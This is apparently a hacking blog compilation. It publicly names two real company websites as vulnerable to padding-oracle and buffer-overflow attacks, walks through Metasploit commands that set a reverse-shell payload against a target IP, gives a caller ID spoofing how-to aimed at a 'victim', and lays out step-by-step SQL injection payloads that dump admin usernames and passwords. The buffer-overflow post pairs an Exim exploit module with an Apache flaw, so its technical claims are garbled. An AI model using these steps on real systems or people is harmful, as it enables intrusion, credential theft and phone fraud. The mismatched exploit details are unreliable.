Big Bazaar is under ASP.NET Padding Oracle Vulnerability

In cryptography, a padding oracle attack is a side channel attack which is performed on the padding of a cryptographic message. The plain text message often has to be padded (expanded) to be compatible with the underlying cryptographic primitive. Leakage of information about the padding may occur mainly during decryption of the ciphertext. Padding oracle attacks are mostly associated with ECB or CBC mode decryption used within block ciphers. Padding modes for asymmetric algorithms such as OAEP may also be vulnerable to padding oracle attacks.

But recent days I was testing Big Bazaar(http://www.futurebazaar.com/)website for vulnerabilities and I found that the website is vulnerable to oracle padding attack.

ASP. Net uses encryption to hide sensitive Data and protect it from tampering by the client. However, a 

Vulnerability in The ASP. Net encryption implementation can allow an attacker to decrypt and Tamper with this data. This vulnerability exists in all versions of ASP.NET. An An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the Target server, such as web. Config. This would allow the attacker to tamper with The contents of the data. By sending back the altered contents to an affected The server, the attacker could observe the error codes returned by the server.

A workaround to prevent this vulnerability is to enable the <customErrors> feature of ASP.NET, and explicitly configure your Applications to always return the same error page - regardless of the error Encountered on the server. By mapping all error pages to a single error page, You prevent a hacker from distinguishing between the different types of errors That occurs on a server.

Items that are affected:

• /

Vulnerability Impact:

An attacker who exploited this vulnerability could view data, such as the View State, which was encrypted by the target server, or read data from files on the target server, such as web.config. This would allow the attacker to tamper with the contents of the data. By sending back the altered contents to an affected server, the attacker could observe the error codes returned by the server.

Preventions:

1) Edit your ASP.NET Application's root Web.Config file. If the file doesn't exist, then create one in the root directory of the application.

2) Create or modify the <customErrors> section of the web.config file 

Loop Mobile is Vulnerable To Buffer Overflow Attack

Loop mobile is the best and leading service provider in Mumbai and it also provides the best connectivity solutions. The website of the company also provides you the best information that might be helpful for resolving the query. You can even send mails to the company through the website by just filling the form and entering a few details. You would get the reply soon on the issue and it will be well taken care of. They even have the facility of letting you recharge your phone online. They have the customer workshop section that will have their team asking you the problem faced or suggestions to improve the services. You just need to enter a few details and the company would let you know when and where the workshop is. With the help of Loop Mobile customer care number you can get a safe and long-lasting usage of the Loop Mobile services.

But recent days I was testing loop mobile(www.loopmobile.in) website for vulnerabilities and I found that the website is fully vulnerable to buffer flow attack. The reason behind is that that the website is running on Apache 2. X version older than 2.0.51 server.

Affected Apache versions:

• Apache 1.3.28 - 1.3.36 with mod_rewrite
• Apache 2.2.0 - 2.2.2 with mod_rewrite
• Apache 2.0.46 - 2.0.58 with mod_rewrite

The impact of this vulnerability is that an attacker may exploit this issue to trigger a denial-of-service condition. Reportedly, arbitrary code execution may also be possible

About Buffer Flow Attack:

In computer security and programming, a Buffer overflow or Buffer overrun , is an anomaly where a program, while writing data to a buffer, overruns the buffer boundary and Overwrites adjacent memory. This is a special case violation of memory safety. Buffer overflows can be triggered by inputs that are designed To execute code, or alter the way the program operates. This may result in erratic program behavior, including memory Access errors, incorrect results, a crash, or a breach of system Security. They are thus the basis of many software vulnerabilities and can be maliciously exploited.

How It can be done with an example:

Step 1:

Load your Backtrack 5 machine and open terminal.

Step 2:

Type msfconsole in it.

msfconsole means Metasploit console, Most of people think that by Metasploit they will hack Pc's easily, they are foolish people.The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework , a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

Step 3:

Now type 

msf >use exploit/unix/smtp/exim4_string_format

Step 4:

Type 

msf exploit(exim4_string_format) >show payloads

Step 5:

Type 

msf exploit(exim4_string_format) >set PAYLOAD generic/shell_reverse_tcp

Step 6:

 Type

msf exploit(exim4_string_format) >set LHOST [MY IP ADDRESS]

Step 7:

Type

msf exploit(exim4_string_format) >set RHOST [TARGET IP]

Note: Here the thing is to get the IP of the victim (web server), you can also use ping command to get the IP details.

Step 8:

This is the last step to exploit--- 

Type

msf exploit(exim4_string_format) >exploit

Author Bio:

Ashwin Kak, co-founder of this blog and the author of this post, is an SEO executive by profession. He's a simple person with all possible emotions present at different degrees. In his spare time, he enjoys trekking and blogging.

What is Caller ID spoofing and How it is Done....

Note: Caller ID spoofing is Totally illegal. This post is only for educational purpose, the author of this website will not be responsible for any misuse.

Caller ID spoofing is the practice of causing the telephone network to display a number on the recipient's Caller ID display that is not that of the actual originating station. The term is commonly used to describe situations in which the motivation is considered malicious by the speaker or writer. Just as E-mail spoofing can make it appear that a message came from any e-mail address the sender chooses, Caller ID spoofing can make a call appear to have come from any phone number the caller wishes. Because of the high trust people tend to have in the Caller ID system, spoofing can call the system's value into question as said by Wikipedia.

How To Do:

Step 1:

There are lots of websites which offers call id spoofing u can also search on Google.

But my best is http://www.crazycall.net/ because it works 100%. Now open the website which looks like this:

Step 2:

Now the next step is to select the country,call id you want to display on the mobile of the victim and the last victim mobile number

Step 3:

Now the last step is to click on the get me code and a code will be generated on the right side of the the website..

Step 4:

Now your crazy call is ready!!!, just dial the given number and type the code when asked with your Phone.

Note: It may apply charges.

Manual PenTest of SQL injection on MYSQL.

MySQL is the world's most popular open source database software, with over 100 million copies of its software downloaded or distributed throughout its history. With its superior speed, reliability, and ease of use, MySQL has become the preferred choice for Web, Web 2.0, SaaS, ISV, Telecom companies and forward-thinking corporate IT Managers because it eliminates the major problems associated with downtime, maintenance and administration for modern, online applications.

Many of the world's largest and fastest-growing organizations use MySQL to save time and money powering their high-volume Web sites, critical business systems, and packaged software � including industry leaders such as Yahoo!, Alcatel-Lucent, Google, Nokia, YouTube, Wikipedia, and Booking.com.

The flagship MySQL offering is MySQL Enterprise, a comprehensive set of production-tested software, proactive monitoring tools, and premium support services available in an affordable annual subscription.

MySQL is a key part of LAMP (Linux, Apache, MySQL, PHP / Perl / Python), the fast-growing open source enterprise software stack. More and more companies are using LAMP as an alternative to expensive proprietary software stacks because of its lower cost and freedom from platform lock-in.

MySQL was originally founded and developed in Sweden by two Swedes and a Finn: David Axmark, Allan Larsson and Michael "Monty" Widenius, who had worked together since the 1980's. More historical information on MySQL is available on Wikipedia....

Note: This post is only for educational purposes,the author of this website will not be responsible for any kind of misuse..

Step 1:

How to Check vulnerability:

Let us take an  think that we have some site like this:http://www.target.com/images.php?id=1.Now to test if  vulnerable we add to the end of URL ' (quote),and that would be http://www.target.com/images.php?id=1'so if we get some error like"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near  at line 1"

Now from this we get to know that the website is running on MYSQL server.....

Step 2:

How to find number of columns:

To find number of columns we use statement ORDER BY (tells database how to order the result)so how to use it? Well just increment the number until we get an error.http://www.target.com/images.php?id=1 order by 1/* <-- no errorhttp://www.target.com/images.php?id=1 order by 2/* <-- no errorhttp://www.target.com/images.php?id=1 order by 3/* <-- no errorhttp://www.target.com/images.php?id=1 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)So,that means that it has only 3 columns and when we cause we got an error on 4.

Step 3:

How to check for UNION function:

With union function we can select more data in one SQL statement.i.e we have http://www.target.com/images.php?id=1 union all select 1,2,3/*NOTE: if /* not working or you get some error, then try --it's a comment and it's important for our query to work properly.(we already found that number of columns are 3 in section 2). )if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

Step 4: 

How to check for MySQL version:

http://www.target.com/images.php?id=1 union all select 1,2,3,4/*let say that we have number 4 on the screen, now to check for versionwe replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45.The version should be greater than 5 , if its less than 5 you should guess the table name.

Step 5:

How to get table and column name:

http://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()we get table names.check for table name admin of some login user.now to check column names.To check the columns replace the word �table� with columnhttp://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_valuenote: the table should be in hex value.(this works mostly)we get columns displayed on screen, user id, passwd etc...now to retrieve values use:http://www.target.com/images.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*

It will show username and passwords on the screen..

Posted by: Anshuman kak